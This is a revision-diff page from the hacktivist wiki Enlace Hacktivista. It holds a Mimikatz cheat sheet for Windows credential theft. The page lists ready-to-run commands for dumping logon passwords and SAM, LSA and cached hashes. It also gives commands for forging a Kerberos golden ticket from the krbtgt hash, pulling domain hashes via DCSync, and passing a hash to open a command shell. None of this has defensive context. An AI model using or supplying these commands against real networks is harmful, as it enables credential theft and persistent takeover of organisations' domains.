Mimikatz: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
Line 13: Line 13:
* privilege::debug
* privilege::debug
* lsadump::lsa /inject /name:krbtgt
* lsadump::lsa /inject /name:krbtgt
* kerberos::golden /user: /domain: /sid: /krbtgt: /id:
* kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID>
* misc::cmd
* misc::cmd


Revision as of 22:16, 24 June 2023

Steal creds

  • privilege::debug
  • sekurlsa::logonpasswords

Dump Hashes

  • token::elevate
  • lsadump::sam
  • lsadump::lsa /patch
  • lsadump::lsa /inject
  • lsadump::cache
  • sekurlsa::ekeys

Create a golden ticket on DC

  • privilege::debug
  • lsadump::lsa /inject /name:krbtgt
  • kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID>
  • misc::cmd

Retrieve the password hashes of user accounts from a domain controller

  • lsadump::dcsync /user:<USER>

Pass the Hash

  • sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd
Retrieved from "https://enlacehacktivista.org/index.php?title=Mimikatz&oldid=1059"